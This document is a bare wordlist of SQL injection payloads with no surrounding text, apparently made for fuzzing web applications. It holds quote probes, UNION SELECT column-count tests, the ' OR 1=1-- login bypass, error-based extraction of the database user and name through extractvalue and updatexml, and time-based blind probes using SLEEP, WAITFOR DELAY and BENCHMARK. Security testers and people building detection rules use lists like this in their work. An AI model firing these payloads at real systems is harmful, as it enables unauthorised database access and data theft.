'
"
`
')
")
`)
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT 1,2,3--
' UNION ALL SELECT NULL,NULL,NULL--
' OR 1=1--
" OR 1=1--
' OR 'a'='a'--
' AND extractvalue(1,concat(0x7e,(SELECT user())))--
' AND updatexml(1,concat(0x7e,(SELECT database())),1)--
' SLEEP(5)--
" SLEEP(5)--
' OR SLEEP(5)--
" OR SLEEP(5)--
' AND SLEEP(5)--
" AND SLEEP(5)--
' WAITFOR DELAY '0:0:5'--
" WAITFOR DELAY '0:0:5'--
' OR WAITFOR DELAY '0:0:5'--
" OR WAITFOR DELAY '0:0:5'--
' AND WAITFOR DELAY '0:0:5'--
" AND WAITFOR DELAY '0:0:5'--
' BENCHMARK(5000000,MD5(1))--
" BENCHMARK(5000000,MD5(1))--
' OR BENCHMARK(5000000,MD5(1))--
" OR BENCHMARK(5000000,MD5(1))--
' AND BENCHMARK(5000000,MD5(1))--
" AND BENCHMARK(5000000,MD5(1))--